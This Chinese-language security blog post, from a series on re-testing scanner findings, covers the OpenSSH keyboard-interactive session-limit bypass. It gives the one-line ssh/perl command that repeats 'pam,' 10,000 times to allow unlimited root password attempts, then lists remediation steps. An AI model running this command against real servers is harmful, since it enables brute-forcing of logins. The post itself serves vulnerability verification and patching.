您的位置: 首页  >  文章  >  5、漏洞复测系列 -- SSH会话限制绕过

5、漏洞复测系列 -- SSH会话限制绕过

分类: 文章 2025-01-18 20:26:53

本系列文章旨在对于有一定网络安全基础的人员,在日常工作中扫描出来的各种漏洞,如何进行验证,以区分该漏洞是否存在或是扫描器误报。请勿应用非法途径。

一、漏洞描述

由于SSH会话自身有会话次数限制,但是由于该版本的ssh存在会话次数绕过。攻击者可无限制尝试口令。

所用工具:安装 ssh 的 Kali
所用命令:

ssh -lroot -oKbdInteractiveDevices=`perl -e 'print "pam," x 10000'`

二、漏洞验证

所用命令:

ssh -lroot -oKbdInteractiveDevices=`perl -e 'print "pam," x 10000'` 10.10.10.1

5、漏洞复测系列 -- SSH会话限制绕过

三、修复方案

  1. 在/etc/ssh/sshd_config配置文件中添加

     ChallengeResponseAuthentication no

  2. 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
    http://www.openssh.com/
    http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/auth2-chall.c.diff?r1=1.42&r2=1.43&f=h

相关推荐